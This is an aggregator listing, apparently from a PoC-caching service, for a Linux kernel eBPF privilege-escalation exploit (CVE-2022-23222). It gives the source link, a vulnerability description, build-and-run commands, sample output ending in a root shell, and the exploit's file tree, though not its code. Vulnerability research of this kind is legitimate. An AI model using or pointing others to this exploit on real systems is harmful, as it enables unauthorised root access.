CVE-2022-23222 PoC — Linux kernel 代码问题漏洞

Source

https://github.com/tr3ee/CVE-2022-23222

Associated Vulnerability

Title:Linux kernel 代码问题漏洞 (CVE-2022-23222)
Description:Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 Linux kernel 5.15.14及之前版本存在代码问题漏洞，攻击者可利用该漏洞获得特权。

Description

CVE-2022-23222: Linux Kernel eBPF Local Privilege Escalation

Readme

# CVE-2022-23222

Chinese writeup: https://tr3e.ee/posts/cve-2022-23222-linux-kernel-ebpf-lpe.txt

For educational/research purposes only. Use at your own risk.

## Build & Run

```bash
$ make
cc -I include -static -w -o exploit exploit.c
$ ./exploit 
[*] phase(1/8) 'create bpf map(s)' running
[+] phase(1/8) 'create bpf map(s)' done
[*] phase(2/8) 'do some leak' running
[+] phase(2/8) 'do some leak' done
[*] phase(3/8) 'prepare arbitrary rw' running
[+] phase(3/8) 'prepare arbitrary rw' done
[*] phase(4/8) 'spawn processes' running
[+] phase(4/8) 'spawn processes' done
[*] phase(5/8) 'find cred (slow)' running
[+] phase(5/8) 'find cred (slow)' done
[*] phase(6/8) 'overwrite cred' running
[+] phase(6/8) 'overwrite cred' done
[*] phase(7/8) 'spawn root shell' running
[+] Enjoy root!
# id
uid=0(root) gid=0(root) groups=65534(nobody)
# exit
[+] phase(7/8) 'spawn root shell' done
[*] phase(8/8) 'clean up the mess' running
[+] phase(8/8) 'clean up the mess' done
```

File Snapshot


 [4.0K]  /data/pocs/961e189110fc035bd1de92cc24f27c825a198967
├── [ 16K]  exploit.c
├── [4.0K]  include
│   ├── [ 31K]  bpf.h
│   ├── [ 362]  config.h
│   ├── [ 10K]  debug.h
│   └── [1.9K]  helper.h
├── [ 164]  Makefile
└── [ 974]  README.md

1 directory, 7 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!